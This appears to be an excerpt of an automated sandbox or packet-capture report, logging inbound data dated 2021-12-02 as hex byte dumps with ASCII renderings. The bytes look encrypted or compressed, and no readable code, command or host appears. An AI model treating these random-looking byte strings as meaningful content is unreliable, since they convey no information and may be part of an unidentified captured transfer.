e2
                      Data Ascii: aDDr4?lI#q"~r=}^*mUY9l]B(>RhfnuF+&[(/l"2U`g+zQj.+'A7L~X^><P>Ans%;-EXZAa=avQL\<_q3@UT%-)`Gs$69t3gLxH=
                      2021-12-02 07:33:44 UTC32INData Raw: ef 73 78 19 f8 17 3c 5e b3 e2 95 10 53 61 4f 41 cb 95 f2 43 ad 43 9b ee 66 85 f0 fe 2b ab d4 dd 9c 4b 36 0a 71 62 13 42 4b 4d 2e 79 8f dd 1f 82 22 91 c4 89 ed 3a f6 14 c2 87 23 82 aa 5d e9 74 c2 37 20 55 69 2f d9 79 02 05 4e ac f5 ed 4c 9b 96 1b 75 eb 1e 1b db 41 f0 fa 40 3f 3f b0 40 6f bd c3 6d 92 e6 f2 28 a8 db d9 f4 30 54 19 84 06 81 30 83 5e 10 ce af 68 9d e5 e8 ce ec 4e ce 3f af 9f f3 c1 56 5a 74 51 c7 13 13 b9 81 2e 74 7e b6 d2 22 69 d0 a5 7f fd 71 a1 f0 b3 b8 04 a0 51 89 ea 86 6f 00 e7 a6 0f ec 16 e3 ee 2b 4b 70 d1 13 10 7a 68 5e f6 cf 58 a8 9f 5f d7 ae 1b 57 35 23 88 ca a6 cd dd ce a0 ee d1 44 da 4b 8a 8b 69 de 29 92 9c c7 ef ba 40 ed 62 c2 bb 0a d3 0c 1b 16 62 23 13 dc db b5 17 d2 d3 29 48 d5 03 78 7c 5b f5 b5 72 6b 5c 8d 35 58 72 5f ce 11 f3 a3
                      Data Ascii: sx<^SaOACCf+K6qbBKM.y":#]t7 Ui/yNLuA@??@om(0T0^hN?VZtQ.t~"iqQo+Kpzh^X_W5#DKi)@bb#)Hx|[rk\5Xr_
                      2021-12-02 07:33:44 UTC33INData Raw: 95 56 eb 20 03 eb 4e 81 bf b8 3c ed 72 6a 3d e2 df a0 e7 90 98 7e 53 eb d6 fb d8 c7 50 eb 4f 7b 83 c4 a0 54 f1 43 01 96 5e a6 41 4e 0b 64 9f e4 2b bc 31 28 fd 91 9a 77 79 c5 a8 ad bc 79 39 5e 9c d2 02 42 db e4 01 5f dd c2 ed 33 4e cf 75 f1 96 dd 80 ad ad 7e 32 57 88 6d c9 19 5c 05 27 68 3c 3c 62 55 ae 71 6e 1e 71 ae 87 05 12 66 38 1d 61 c4 c9 1e 64 f8 6a 05 ca 3a a0 dd cd 78 5f fe be d6 39 4e 53 65 9e 2c c9 a1 58 d8 13 a3 21 22 56 4e e5 de 72 63 2d 3d 34 01 97 c0 3a 27 55 2d 38 57 6b 15 cf ad 12 9a d5 ca 3b da 18 06 39 54 ea 6c c1 9a 18 1e f2 06 79 6d 07 c9 a0 26 37 29 cc 7f c0 da 0a cb 51 8b 71 bc 05 72 ee fe 26 85 14 bd 8e 87 32 5b a1 ac 99 d4 3f e4 83 7f 80 73 b4 f5 95 72 1d c2 a2 ed 1d b0 06 36 0b 28 c1 53 38 47 c8 ea bf e3 4f 6a 23 8d c5 a0 a4 7a 56
                      Data Ascii: V N<rj=~SPO{TC^ANd+1(wyy9^B_3Nu~2Wm\'h<<bUqnqf8adj:x_9NSe,X!"VNrc-=4:'U-8Wk;9Tlym&7)Qqr&2[?sr6(S8GOj#zV
                      2021-12-02 07:33:44 UTC34INData Raw: a5 33 e4 6c 96 d5 de ec 32 af 3a 96 76 de 98 82 e3 08 62 1a 5d b2 51 02 11 dd 0a 35 59 a8 87 ce 9f ce ce 0c 74 27 62 3c 0a ff ad 55 96 8a 93 cc 0a a4 1f f5 15 3c 0b e7 47 af 88 0d c5 1a f8 ab 95 e4 7e ef 6e 85 9a 54 50 30 92 c1 41 a2 ef 03 61 cd 31 76 69 a6 99 de 75 82 43 ad 96 f7 e8 a3 91 5b 5b 00 27 76 3f 41 2d 3d c2 76 aa 6b a2 5b 66 9a 02 b9 b2 ba 3c 38 69 30 79 a1 1c e5 7c e5 c6 21 d4 f0 c6 a8 d9 0a 79 3a 7e 40 7d fb 31 2f 8f c1 8a 50 f1 e7 5e c9 14 a0 58 27 ef 6f 61 92 da cc be 2a db 94 fa 44 d0 8a c0 d5 1d 83 f9 07 ad f4 96 ec 00 8e a4 27 6d e3 48 37 f9 c9 1e ce d8 c0 4d cb 89 c5 5b 4b 86 48 52 31 79 a0 bd 18 0c 93 92 36 23 37 85 ad 1f 1c 63 3c c3 a7 29 54 3c 93 ce 79 2f 67 4d bf 24 9e 0a 67 45 3b 9b 6e 99 7d c8 a9 f1 a0 9b f6 ff 83 2e fd 9e 8f db
                      Data Ascii: 3l2:vb]Q5Yt'b<U<G~nTP0Aa1viuC[['v?A-=vk[f<8i0y|!y:~@}1/P^X'oa*D'mH7M[KHR1y6#7c<)T<y/gM$gE;n}.
                      2021-12-02 07:33:44 UTC35INData Raw: 07 be b2 da ab e9 dd 34 b0 7a 42 14 bf 2f 02 ca 13 f1 1c 3d 8a f1 03 a1 be 8d 75 54 ab 1d 8b 96 a9 6f 9b 07 05 d7 c4 c5 f8 c3 02 59 3d 7f 91 d5 38 d1 25 27 43 32 0c 49 77 67 b1 00 09 b6 03 d1 ff 59 31 f3 9e a4 6c 7b c4 fa 6c 04 61 56 a9 23 48 7b e9 d4 3b 6f 66 83 8e 9e ef e6 33 af 74 c5 56 ee 69 6c a3 3e 53 1e 2c c5 8b 1b 18 0d f3 8d d4 b0 04 cb f1 1f bf e1 72 8d 52 40 9d d4 29 87 ec 22 cb a9 ab 8c 0e 2b e8 5c 0c 87 bb 2e 24 30 ac 83 37 1d c0 8c 36 23 ac 18 34 78 c0 5e 07 d2 fd 59 c2 c0 00 13 28 04 c8 3f 14 a4 26 c6 6f ed 93 d2 eb 96 b6 86 7a ee 5b 5c a2 f9 80 98 c3 c0 33 03 55 0d 81 80 ff 04 c9 b1 ce b8 7c 24 52 45 fa 40 27 c8 b7 7e 6a a7 a9 d9 d6 0e 14 ba b2 5c 53 bb a4 82 9e 55 38 3d 6e cf c4 28 c8 b9 a8 e3 13 59 36 fc 8f b3 78 52 c8 c3 3f f7 e1 88 7d
                      Data Ascii: 4zB/=uToY=8%'C2IwgY1l{laV#H{;of3tVil>S,rR@)"+\.$076#4x^Y(?&oz[\3U|$RE@'~j\SU8=n(Y6xR?}
                      2021-12-02 07:33:44 UTC37INData Raw: ae 8f 92 62 80 ae a3 b2 66 85 05 24 90 f8 bd a2 cd 17 aa 1b f9 51 8e 8e 32 4d a7 0c 23 29 2e 4e 21 42 c1 e6 ca 23 39 b6 12 a0 8d 72 c3 7b 0a 4a eb c3 84 7f 0d ba a8 43 fe e8 eb b0 90 95 a8 dd 48 b1 ef ec 13 06 18 18 fa 00 9c 59 5d 3f 2d a6 b2 cc 40 da 56 34 88 25 21 47 52 d1 9c 17 63 d5 1c f8 f9 07 cc 5c 7e 65 3b 50 de 20 1a b7 45 ca 34 4c 92 84 6b d2 79 93 0d 7c 2c 9e 9c ca 17 f1 74 c2 a0 73 32 41 52 9d a0 83 35 d6 41 05 d8 16 40 f4 ea 65 57 b8 2e 48 36 a2 5e 83 cb 61 64 d6 9f 24 e5 84 00 4a f0 ef 53 ca 8a 84 86 4e d9 b3 39 cc d1 c2 08 27 37 b8 b0 75 d3 97 ce 44 e2 6e fe a0 9d 19 c2 a9 9e 45 d7 a0 9f 6a 29 47 ed ae 18 67 1c 90 95 3f 9f 01 82 4a ce 3a 32 19 87 7e bf 78 e8 56 c2 f0 35 6e 0f ec a6 df b4 bc 26 b3 49 26 40 7c db 5d 91 11 81 0b 25 dc 62 a2 0a
                      Data Ascii: bf$Q2M#).N!B#9r{JCHY]?-@V4%!GRc\~e;P E4Lky|,ts2AR5A@eW.H6^ad$JSN9'7uDnEj)Gg?J:2~xV5n&I&@|]%b
                      2021-12-02 07:33:44 UTC38INData Raw: b8 d1 93 02 bb b2 76 7e e9 f7 da 58 5c ab 1e 28 0c d2 fc 13 bb e9 11 66 31 d0 6a 7c 98 a4 40 4d 35 e2 ab 7e c9 1b 3c 8d f6 40 98 8f b1 d8 7d d2 5c 17 c2 ce 03 c0 5d 31 49 5b 19 32 9d e3 14 29 58 14 39 8a 76 6d 95 67 5e 24 63 f5 2f 80 d6 22 b1 eb 3d 8d 9e e7 f8 d4 99 a8 67 88 24 ad 0c 0d c6 71 5e 65 90 24 3d 3a 16 d8 2d 0d b3 f5 ec 15 d0 20 05 62 47 de 25 3e 3f e0 8c db a5 f7 12 b2 d4 03 21 31 80 b1 71 42 42 b5 2c f7 38 7c f1 72 61 7a 36 e0 f6 94 4f 8c 50 44 80 5f 4b 60 1b 2e b2 3f f9 1f 3d 56 43 a6 79 ee 6c c0 1d 87 0e bf 88 5d a4 8b 4f 95 f6 c0 a7 ad 3f db ba 3e 94 50 fe 49 f5 f2 46 e2 33 34 9e 6c 80 8b a3 8c 29 ba d1 18 16 8a 20 cc 72 74 ba 68 0c 02 ad ec 71 23 76 10 d0 13 8e 48 c3 75 d2 90 9d 47 ee ec a3 d0 3e 41 e3 a4 7d 84 6b a5 0d 14 23 be 9f d2 00
                      Data Ascii: v~X\(f1j|@M5~<@}\]1I[2)X9vmg^$c/"=g$q^e$=:- bG%>?!1qBB,8|raz6OPD_K`.?=VCyl]O?>PIF34l) rthq#vHuG>A}k#
                      2021-12-02 07:33:44 UTC39INData Raw: 60 30 68 15 65 db b9 12 d0 7c f0 4f 7e 55 fa b2 6e aa 97 9d 19 10 16 9c 7f d8 24 60 1e 71 bd 7a f7 80 ce 76 05 82 0f 79 a0 26 4a f3 e4 35 40 89 49 9a 3a d4 ef 91 38 91 6c 5c 04 60 94 0a d9 52 bc 93 67 ba 5f 5d 32 38 11 f7 0f 8f 63 04 50 48 d8 aa 1c 28 be b0 3a 1b 0d 8a 85 1b c1 2c 41 6d 52 5e fc c6 43 af ff 0f fc eb d4 cc b1 09 6b 61 7d 22 32 97 e1 96 ec 7e 5d 94 1d 42 b7 75 06 0a f7 b6 53 4c 0f b0 e3 27 55 8b 70 7d e0 f2 c0 05 bd e4 25 1e 5d 51 11 f1 92 92 2a 1a 69 7e f1 a8 f6 ea e9 79 61 14 75 ee e7 94 39 15 58 88 c1 56 0d af 6b dd 28 fc 03 30 e2 51 b1 fe 0e 31 fc 9e 78 9b f1 db 9e 0c 25 f0 98 c3 c0 bf 25 83 46 02 0f 5b 72 7b 2d 06 6b 3b a7 68 c2 61 56 a9 0a 27 7b e9 dc 0f dc fd d4 38 a8 db a9 04 69 74 7a d2 23 31 2d f5 e5 25 6f 47 8a f7 20 9f ce ba f8
                      Data Ascii: `0he|O~Un$`qzvy&J5@I:8l\`Rg_]28cPH(:,AmR^Cka}"2~]BuSL'Up}%]Q*i~yau9XVk(0Q1x%%F[r{-k;haV'{8itz#1-%oG
                      2021-12-02 07:33:44 UTC40INData Raw: f4 45 ce e2 7c 27 21 91 02 ab f9 31 be 5e 7b 93 50 52 52 03 0d be 44 0f d3 b5 5c f2 c9 4e 00 2a ba 7a e8 f3 82 20 bc 1d 6d 53 99 0e a6 1a 6b 03 61 b9 b6 71 b7 82 98 66 e0 c9 45 99 62 17 4a a3 1b 2e e2 b7 f0 37 66 32 71 3b 61 87 82 35 aa 49 96 05 21 b9 0e d4 b0 f3 2d 88 a2 d5 84 1a 09 b4 18 07 d4 70 28 fd d9 b3 71 05 cd dd 28 ff 0a 6d 89 c6 93 a6 d5 b5 b6 8e e9 37 1b 24 f1 31 05 db f4 bf d0 a9 91 b4 85 21 24 8a e1 a1 ed 0a df ad 12 ba 00 4a 41 89 03 3f 34 eb 03 60 83 81 e0 3d 7d 21 8a 7b 2f b8 de b8 1b 34 d0 9a 29 b3 2c 98 7d 64 2c c9 1f d1 27 d4 5c b4 7b 65 cb da e4 2e 70 6c 3d dc 13 bf c0 fc 27 9f 76 60 1e e0 b8 37 28 e2 e0 f5 0e 23 5f 29 37 c6 03 02 61 70 8c 70 47 ac 5b 3a 06 b6 2a a5 41 17 2d cc 29 7b 54 98 07 6e 5f 4f a4 ff f9 6e c2 c9 46 5d 88 cf 20
                      Data Ascii: E|'!1^{PRRD\N*z mSkaqfEbJ.7f2q;a5I!-p(q(m7$1!$JA?4`=}!{/4),}d,'\{e.pl='v`7(#_)7appG[:*A-){Tn_OnF]
                      2021-12-02 07:33:44 UTC42INData Raw: 23 a2 c4 63 68 84 eb c7 64 11 fd 00 b6 ca 32 55 2e 81 73 4d 42 37 a0 c7 87 af b1 00 b2 0e 72 81 ff f0 d0 0a 90 2d 6c af c4 c0 34 0d 20 56 41 4a cd ec 02 33 be 5f d1 03 02 a1 50 33 b6 ef e6 9e bb f9 3e a9 2a 0d ac f6 ef 9d b1 1c 6c 02 2c d0 18 74 04 cb fb 47 14 1e 1e e1 fc bf 62 04 ba c0 de db b9 9d a5 ab 3a 31 9f e3 b6 88 b5 c9 53 74 0c bd 89 cd 39 f4 bc 82 bd f0 3c 2e 93 09 fd 05 ab 41 47 e8 28 8f bf 13 a3 c3 4c 0d f0 2a 6f c2 4e b1 61 37 54 ea 94 f0 08 e3 57 f5 df 26 95 7e 8c 99 c6 4b a0 94 4e 83 57 e7 31 97 c2 7d 0b ac bb a8 f6 25 1b d6 4a 8b 29 ce 3e a3 37 15 4d 28 ad 63 a4 93 76 8f e1 3d 41 1d a2 20 ea 77 57 4b 1d 66 62 0d b1 82 d0 a8 7b 3d 4d 37 52 00 37 69 f3 64 5e 2e e6 f8 d4 4f 97 a5 fb 3c c7 bb 56 62 bd e3 82 8f 0a 6c 7b 49 08 9c 8e 84 5c 30 89
                      Data Ascii: #chd2U.sMB7r-l4 VAJ3_P3>*l,tGb:1St9<.AG(L*oNa7TW&~KNW1}%J)>7M(cv=A wWKfb{=M7R7id^.O<Vbl{I\0
                      2021-12-02 07:33:44 UTC43INData Raw: dc de 7f 6d 9f b6 e9 57 26 db f2 6b 3c 1d 49 83 16 49 dd f3 8f e6 0f 79 73 d8 88 a0 09 e9 94 95 8b 12 ac 65 00 f1 f3 d4 db 0a 87 4b 02 32 23 0d 5b cd 1d 95 e9 9b d0 9c 68 ca ff 18 5d 80 6c e4 0d 9b d0 06 9a a3 2e 06 24 ec 98 96 9f 24 63 cb db 90 10 91 6f fa d6 a1 31 80 97 d8 65 5f 2b 1a d6 cb e8 b4 21 46 7d 16 95 fb 4b da b5 a9 8b 7e fc 96 0d 01 fb e4 cb bc 8b f3 3b fb af 63 64 41 ba 14 f7 09 1b 4d 71 e9 eb 46 c8 32 79 4c dd 8d 7a 96 eb fc de 72 26 0c 74 f0 cf bf a1 44 4d ee 1f 3e 23 e6 cd 11 cf 18 b4 18 d6 6a d9 2e 67 fb 6f ba 0e eb 23 c0 93 0c b1 7d a1 d6 3f 1f e4 23 7e d4 41 85 5a b3 74 6e 0a fb e3 df 2b fa e4 43 29 be ee b1 fc 0a d6 de 31 4b 85 32 7c ca c3 0f ca 5e 4f c7 a7 7a 34 ee e5 cf 1b 7a 65 41 99 22 cf 82 e3 fa 59 4b 1f ad 6e 43 50 34 77 91 ee
                      Data Ascii: mW&k<IIyseK2#[h]l.$$co1e_+!F}K~;cdAMqF2yLzr&tDM>#j.go#}?#~AZtn+C)1K2|^Oz4zeA"YKnCP4w
                      2021-12-02 07:33:44 UTC44INData Raw: 43 bb 40 b7 1a 8c dc 36 b0 09 d0 5d 2e f7 90 21 56 17 64 b1 4a 2a 22 a9 47 ce b1 0e 37 68 f9 a8 b4 83 b4 fe 83 c1 82 d0 26 6d ee b9 72 71 7e 2d cb 65 46 41 cd 23 7d a8 3a 00 f2 53 31 4c f4 f9 83 7c 16 2a 98 24 15 cd 3b 44 e9 89 b5 af 4a ea 07 ad b8 55 35 a9 2f 7f 20 bb 85 50 9d 9b ce b3 9c ec 26 86 f6 07 14 ef cf 7c b3 19 a1 26 ab 86 a2 45 4c 8b bd 4b ec 58 5a b6 2b c1 a4 ff 88 7a 7e ff 3c 29 86 69 39 c5 7f b4 ca e2 84 4e 97 cc f5 02 ae ca d8 89 48 17 1d c1 e3 f2 f2 11 93 22 8c 86 51 5f c4 13 ac c4 07 c9 0d 7e 38 b2 53 e9 9a 4b b5 8e e8 c0 0f ea 55 d1 9f 56 61 64 77 46 0e 2e aa 58 88 12 65 9a 1c 12 a4 ec 92 ab a9 91 29 3b a8 a4 8e e8 b7 94 45 7b 25 08 ed b4 05 d2 6c c1 1a a6 41 b0 7e 68 28 56 a6 10 10 83 43 1a ba 70 11 fd d2 ee b9 05 02 ea 3d 2c 77 b0 08
                      Data Ascii: C@6].!VdJ*"G7h&mrq~-eFA#}:S1L|*$;DJU5/ P&|&ELKXZ+z~<)i9NH"Q_~8SKUVadwF.Xe);E{%lA~h(VCp=,w
                      2021-12-02 07:33:44 UTC45INData Raw: 24 a1 0b b6 26 ad 45 b4 a8 26 3e 0d 2a fe f2 cb 17 96 dc 41 12 86 f4 34 27 9b 81 4f 8b b4 bc 52 87 aa a2 71 8d 35 fd 5d 11 08 56 d9 ca f2 4f 33 d0 0c bc 90 b6 a7 f1 87 4b 54 25 8c 3c ec c2 0c 3d 31 1a 0b b4 ef b4 23 7c 13 80 e3 bd 20 63 61 09 01 53 5c 5b d4 9f 9e e5 38 b4 59 da f1 e6 8c 72 c6 64 7a 0f 9e 1d 2a 9f 88 f9 64 cc 79 0e e6 43 a5 1d 59 b0 dd 82 4f 6d dd e6 34 92 46 8b 87 f9 96 d2 7a fb ab 01 38 08 36 99 02 88 85 de d2 5a ce 3a e8 20 fc 7f 33 6b b2 ae c2 68 87 0c 79 3a b4 c8 f6 96 0c 83 8f 86 48 01 26 63 6d d9 ff f0 5b f2 13 62 a7 af 87 38 4f 5b ea 1e ca df 59 01 d6 a0 00 a0 ba 39 ba 16 68 3d aa 9b dd 6d ff da 32 6c 64 88 64 01 47 8a a7 04 9c 4b bd 3d f8 e7 ba 34 e4 9f d9 aa 31 08 83 b7 62 78 fa 11 22 95 86 9d b1 28 a6 3c d9 0c 37 39 14 43 a4 86
                      Data Ascii: $&E&>*A4'ORq5]VO3KT%<=1#| caS\[8Yrdz*dyCYOm4Fz86Z: 3khy:H&cm[b8O[Y9h=m2lddGK=41bx"(<79C
                      2021-12-02 07:33:44 UTC47INData Raw: bd 6e bb 8d 4e a0 c6 26 d2 54 25 6f a9 59 a9 78 67 b9 16 2f a5 f0 70 5d 9a 54 e4 df d4 7f 14 5c 6e 11 98 2e 5d 71 d0 8b 20 b0 84 1d c4 f0 d8 5a ea e9 44 dc af 79 34 ea 91 9f 6e 6b 5f 26 1a 7b 14 ea c5 67 c5 58 39 c8 fa 74 d3 85 dd 89 88 4a 89 99 65 dd c2 f8 3f be f6 98 22 da 49 ce ad db f1 4f 17 b0 9d 69 88 57 ae ef 18 c4 55 44 2f fd 03 61 62 38 fe 42 bf a1 e8 de 0c 90 f8 bf 91 e5 31 6d f4 4c ab b7 21 44 08 57 e1 a5 ac 7e e1 0f 42 b7 1d 21 05 fe 59 af 5a b4 dd b5 3e ea a7 6d 46 ac c4 23 ba de b0 c2 90 a7 70 5c ef 94 02 34 b8 98 bd 91 8b eb a6 11 8d 72 8b 32 29 b7 e0 2b be 53 a4 31 ff c8 1d e6 4f c7 d4 33 80 a4 f8 55 b0 56 83 18 a5 01 72 ee 54 65 e7 58 f2 e8 5a 98 e5 91 2a c4 72 45 9d a4 79 80 32 33 e8 59 3f 71 2d 49 4d 88 46 ed d1 29 f7 35 16 51 03 27 e9
                      Data Ascii: nN&T%oYxg/p]T\n.]q ZDy4nk_&{gX9tJe?"IOiWUD/ab8B1mL!DW~B!YZ>mF#p\4r2)+S1O3UVrTeXZ*rEy23Y?q-IMF)5Q'
                      2021-12-02 07:33:44 UTC48INData Raw: 44 c8 de 7e e8 16 9f a1 66 8f f8 63 a5 c6 ba e2 61 af d1 1f 7c 98 bc 4c 46 a1 50 40 7f 63 a7 55 bb ba ca d2 5c 20 af f6 b8 b2 f1 78 68 02 85 06 35 10 45 0c 2d 3a b2 11 09 8d da 35 d5 40 fb 74 ac 61 be f1 45 dc 59 04 15 5b 08 87 2c c6 73 c7 a3 12 4d 61 b0 46 29 03 14 22 6c e8 16 b9 5f c9 a2 9c d6 2b 5c 7b 52 4f 5b 3c b3 e5 6e 1b 57 fa 9d 5f f0 c9 08 02 e4 cd 04 cc 84 b9 db 26 3c 27 6c ec aa 35 6c 54 5d ba 36 af ce a8 77 d6 37 21 40 bf 8f a7 e4 5c 31 88 8c 50 2d 19 cf 5d 66 64 a0 5c 78 0f 65 f9 91 41 46 45 fe 0f ed 28 53 4b bb b5 7e 74 3e ba aa 25 df 9c 81 f7 40 06 4f f3 b5 ea f2 b9 1b 90 d3 cf ff ca 1d a1 3c fb c1 bf f4 e3 d5 a0 5e 22 7f 49 7c 6c 48 73 a6 72 fa 3b 56 47 6d f8 aa 19 e6 18 3e 25 20 a9 a3 44 20 ed 13 50 53 93 b9 2b d7 8d 69 b6 1d a1 26 30 46
                      Data Ascii: D~fca|LFP@cU\ xh5E-:5@taEY[,sMaF)"l_+\{RO[<nW_&<'l5lT]6w7!@\1P-]fd\xeAFE(SK~t>%@O<^"I|lHsr;VGm>% D PS+i&0F
                      2021-12-02 07:33:44 UTC49INData Raw: 34 5a 3e 03 59 c9 a6 c3 13 8d c1 1d 46 61 70 a2 62 e7 51 a4 45 37 3a 26 69 0d 92 89 31 80 6c 01 06 f9 19 c1 49 f4 03 72 ee 10 3b a0 92 b0 b5 0f 9a e5 5e 5f 3c 11 7d df fd 30 82 32 0b 69 a1 9f ff 6f 2c 00 8a 46 52 10 3d 13 e3 54 30 42 25 e9 bf 1c bc fc 61 80 26 b9 3f 0c 2c 4b b4 62 12 ee 4b b7 4b f6 b2 ff e9 2a 55 f9 f4 bf 84 e0 71 26 fe 17 2e f5 08 19 bf 4a c2 fe 28 75 b1 32 2f 4a 66 a2 9d 21 1e 3e e2 44 2b e9 60 aa 64 29 97 0f 19 70 89 5a 1f 39 88 98 5c 19 d6 98 0e 77 cf 9d 6a ec 3b 31 3f 2f ca 8d 5c 04 33 bb ce a3 50 bc ef ea 3b 9d c5 cd 27 0a f5 a9 26 82 35 ca ff e0 76 ab e6 81 11 f1 82 f6 d6 15 f6 2f d1 be 12 4e ff f9 17 84 95 bb 96 42 14 cb db f8 88 53 1b 02 2f 4e ac e5 66 e3 42 d5 42 b3 e8 20 9e eb 07 d3 7e 54 00 0c b2 97 00 9e c4 30 dc fc 03 f1 93
                      Data Ascii: 4Z>YFapbQE7:&i1lIr;^_<}02io,FR=T0B%a&?,KbKK*Uq&.J(u2/Jf!>D+`d)pZ9\wj;1?/\3P;'&5v/NBS/NfBB ~T0
                      2021-12-02 07:33:44 UTC50INData Raw: e7 37 9a aa da a1 ed 10 e3 7c 55 a0 be 15 c0 72 3b ca 0d 99 92 2e c6 af 4a f1 64 f1 83 55 8e 75 c7 e8 cb 0a fd 67 53 9d d6 c6 18 b8 34 f9 e8 1d b7 c6 23 56 73 03 ab fb cb c2 15 55 3c 29 e5 94 cc 90 45 e6 26 9f 0a dd f6 23 74 0c f4 0d 9b a9 f1 66 b7 e1 6d f9 87 e6 9f 8f 9a a7 47 ca 3d 7d bd 64 db de 35 18 32 48 7f 1a 11 b1 06 6e f9 0b d9 0e 73 ee 6b 6c d0 21 7d f7 26 93 e4 5e a0 70 d4 c7 c8 bf 05 87 33 0b 5f 6e 73 b6 a8 6e 31 8b 47 52 62 a0 ca 79 52 72 7f d8 e9 bf e3 fd 44 61 0a 64 80 c6 0c 2c f1 b2 ce 9a 61 09 f2 be f6 b2 4d 60 9a dd bd b6 fe 75 e0 71 1a 27 1b 16 31 4a 54 52 4a c2 0f e7 b8 d3 fa e1 0b de a1 a5 63 8f 11 e0 44 dc b1 da ee 0c 11 67 cb 23 0a 6e ad 95 3f 09 2a 0c 8c ec e2 ed b3 f3 6d e1 95 ba c9 05 55 15 91 a3 fb 89 7d 4b 43 6a c6 34 5c 49 f7
                      Data Ascii: 7|Ur;.JdUugS4#VsU<)E&#tfmG=}d52Hnskl!}&^p3_nsn1GRbyRrDad,aM`uq'1JTRJcDg#n?*mU}KCj4\I
                      2021-12-02 07:33:44 UTC51INData Raw: 1d bc 5a b0 d4 92 b3 35 15 50 c0 6d 4f b7 e3 c7 98 79 d2 d1 f4 63 40 05 ad 52 65 28 73 ac fb 0d 39 a7 66 15 99 b0 61 80 2f 7e 4d 1a d3 48 19 de e4 a4 42 97 09 98 d6 b7 cf c5 7e 63 b8 cb aa 93 76 b9 01 3d 41 2c e5 a1 29 f8 25 3f 4e 30 8a 76 6f 82 ff c2 e4 33 2e a1 59 63 74 5b cf cd 61 66 8d b9 d4 42 74 3d 9b 7d c7 55 c1 d6 cf 23 85 37 8c 92 6c 3b ec 93 f2 28 68 dc 3e df 20 33 06 b3 21 da d1 20 6b a7 db 3c 5c 1d 0c 9f 45 31 bc 10 bd 2b 40 1a 85 07 e6 d3 52 ba cc 2f 82 98 e0 98 e2 45 9a 06 5f 70 69 de 98 15 ed e8 be 74 2f c6 84 b8 59 8a 1a ca 7a 3e ca 3e b6 a4 56 a4 ca 8c a3 f3 6b ff ad eb d3 97 1a 93 50 32 45 07 c8 a9 22 31 c4 07 4a c9 3a 82 b5 90 23 e6 31 8a 3f df c0 50 98 6c 95 95 56 c9 7b 94 34 44 2c ee bb 95 fd f5 e0 23 90 ad ff e3 ec a3 3f 5b 90 32 50
                      Data Ascii: Z5PmOyc@Re(s9fa/~MHB~cv=A,)%?N0vo3.Yct[afBt=}U#7l;(h> 3! k<\E1+@R/E_pit/Yz>>VkP2E"1J:#1?PlV{4D,#?[2P
                      2021-12-02 07:33:44 UTC53INData Raw: b2 c7 59 8a 74 5a 8e 84 20 4c 66 46 a2 e3 a5 6b da 39 de d1 c2 0f 7e 31 02 7b ed c6 c5 d6 87 bb 58 84 1f d1 d3 c9 37 00 1d ee fa af be 8f 76 d1 ae cc 03 0a 52 2d aa 8b 45 4c 0c 92 bd 7d 41 98 ca e3 c3 a9 d9 74 cc 83 b4 5e 01 eb e8 64 33 7c 4a f5 5d 3d b0 1e e7 4c b0 b2 48 d8 0c 0b 66 40 e4 bd c5 b2 23 2d 8c a1 2b 9c cb fd b3 1f 61 24 91 48 ac f8 6f 64 96 2b 15 53 db 7e 62 c8 bd a2 d4 5f 86 1d 86 5e f8 18 24 f2 30 e3 d2 76 42 b5 db 23 b9 db 8e bb bd a3 08 0f bb 58 23 60 02 12 08 73 3b 55 84 62 09 d0 5d 01 e4 4b cd 1d d5 7a 16 c6 ba 25 97 eb 0c bf 4d 84 fa f0 32 66 4c 10 46 30 f1 97 03 bb fa d2 7a 94 1f 81 f3 8a 07 d9 cb 1c a0 b6 37 45 5d e8 bd 7d 77 c8 1e 32 3c e6 01 dc fc 8a 74 b9 ae d9 1d da db 4c a4 6a de 2b fe 9d 71 1e e4 0d 68 ab 67 42 50 89 4b 90 64
                      Data Ascii: YtZ LfFk9~1{X7vR-EL}At^d3|J]=LHf@#-+a$Hod+S~b_^$0vB#X#`s;Ub]Kz%M2fLF0z7E]}w2<tLj+qhgBPKd
                      2021-12-02 07:33:44 UTC54INData Raw: 1d 46 28 06 75 b4 6c 21 48 f6 36 cb 04 a5 0b dd a1 96 48 3f 0d 8d 23 ae 82 2e 18 a8 51 52 28 c7 be 44 00 6c 10 b8 52 c9 4e b2 d2 61 63 df 0b cb 76 d7 97 86 2f 9e e1 51 c7 75 79 61 49 6c d8 12 82 12 65 6a 30 f5 70 74 e8 ec 05 31 85 f5 99 d7 71 d0 6b 76 83 44 9a 1a eb c4 f8 d6 bc 8a 03 da 52 ad 14 42 38 fb 6e b2 6c 39 58 c9 18 5d fe b3 12 c0 14 90 94 17 73 48 10 fe c8 e4 61 f6 40 5b 3d f3 62 e2 35 c8 18 39 74 bc 0a eb 3f 3d fe 5d 31 29 c2 7f 00 e1 91 ef db c0 3f 9c 17 d8 41 e6 64 7a 23 95 5d 35 3f 57 5c e3 6d 2d cc f8 bd ae c5 9b 29 28 d1 24 2f c3 a0 91 bd 4b 58 e4 84 b3 d1 61 40 a3 4b a1 f8 56 91 0e f7 00 39 b6 30 c6 bb 88 69 8e 37 9f d9 4e 01 9e 92 1b 82 03 df 4b c7 07 84 07 58 8b 47 8b 28 0f 89 21 25 1e 56 60 e6 51 7a a0 3d 4b 45 3a 7d d4 37 d6 f7 8f 89
                      Data Ascii: F(ul!H6H?#.QR(DlRNacv/QuyaIlej0pt1qkvDRB8nl9X]sHa@[=b59t?=]1)?Adz#]5?W\m-)($/KXa@KV90i7NKXG(!%V`Qz=KE:}7
                      2021-12-02 07:33:44 UTC55INData Raw: 67 96 fd ff f8 94 ed 80 8f 8a ce d2 f4 47 a7 44 e4 f5 d6 9e ef 55 a6 08 a3 37 4a c7 c6 5b ca bd 9e a5 16 aa 94 0f 35 d5 1f 9c 2e e8 16 dc 0d ec bf eb 5f cf a5 b1 f2 df 63 75 e4 d7 84 fe 50 78 a0 c6 27 c8 82 50 8d 5a 95 6b 92 d6 2a b7 d2 5c 67 ac 9c b9 8a 01 14 6c c8 4e 41 7d 10 ad 2c 2e 65 b6 6d 32 c5 ac 35 61 78 0b 3c a8 ab 75 e1 2c df b1 00 15 0c 0c 12 d3 ac 7d 8e d9 3d 37 f8 7f 40 9f 83 05 d9 e5 d0 6c f6 d1 ee a2 2d f6 d1 15 bc 3f 39 25 3c b3 8f 26 fa 91 c2 6d 03 f4 03 c3 7f 64 b9 e0 aa 87 fa df 26 b6 d0 8c d9 4a 0d dc a0 5f 0c c9 0f b1 ed 08 ee 31 21 fb ab 73 14 91 dd 9e a7 25 ed 29 19 63 fd 6b d6 17 64 ab 2b be 73 91 3d 41 31 01 20 70 8d 57 4b bb 44 66 9e 2e 08 d0 0e db 16 96 1f 01 fe 2d cb cf 47 ed ae e4 8d 2b 30 00 78 78 95 3f 